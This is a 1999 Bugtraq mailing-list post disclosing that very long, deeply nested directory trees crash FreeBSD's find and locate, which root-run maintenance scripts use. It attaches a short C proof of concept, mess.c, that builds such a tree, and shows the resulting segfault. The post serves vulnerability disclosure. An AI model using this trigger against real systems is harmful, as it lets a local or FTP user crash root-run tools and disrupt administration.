Bugtraq mailing list archives
Re: Buffer overflow in ftpd and locate bug
From: venglin () LAGOON FREEBSD ORG PL (Przemyslaw Frasunek)
Date: Sun, 2 May 1999 20:37:35 CEST
> I had a problem with locate from findutils-4.1.24.rpm from Redhat-5.1. It segfaults if we have a huge directory at incoming ftp which was created by exploits for the ftpd realpath hole. My ftpd is patched. Those exploits, I think, should not scare me, but if updatedb puts that directory into the locate database then locate segfaults (getline.c row 104 by gdb). I guess it can be used for running arbitrary commands if root runs locate.
I've noticed a similar problem with /usr/bin/find on FreeBSD. By creating a _very_ long and deep directory structure it's possible to segfault /usr/bin/find (it's also used in the /etc/periodic scripts, which run as root). Example: I'm creating a directory structure with 300 subdirectories, each 255 chars long (source in attachment; it's also possible to do it via ftpd, because it calls mkdir() and chdir()).

lagoon:venglin:/tmp/jc> find example > /dev/null
Segmentation fault (core dumped)

Gdb shows that the function puts() was overflowed when it tried to print a very long path. Also other system tools (rm, ls) have big problems with such directory structures.

--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin () lagoon freebsd org pl ** PGP:D48684904685DF43EA93AFA13BE170BF *

Attachment: mess.c (2 May 1999, 19:01; 748 bytes)

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define DUMP 0x41   /* 'A': every directory name is 255 of these */

int main(int argc, char *argv[])
{
    char buf[256];  /* 255 name bytes plus the terminating NUL */
    int i = 0;

    if (argc < 3) {
        fprintf(stderr, "usage: %s <dir> <depth>\n", argv[0]);
        exit(1);
    }
    if (chdir(argv[1])) {
        fprintf(stderr, "error in chdir(): %s\n", strerror(errno));
        exit(1);
    }
    memset(buf, DUMP, 255);
    buf[255] = '\0';
    /* one level per iteration: create the next directory inside the last one */
    for (i = 0; i < atoi(argv[2]) - 1; i++) {
        if (mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) {
            fprintf(stderr, "error in mkdir() after %d iterations: %s\n", i, strerror(errno));
            exit(1);
        }
        if (chdir(buf)) {
            fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno));
            exit(1);
        }
    }
    exit(0);
}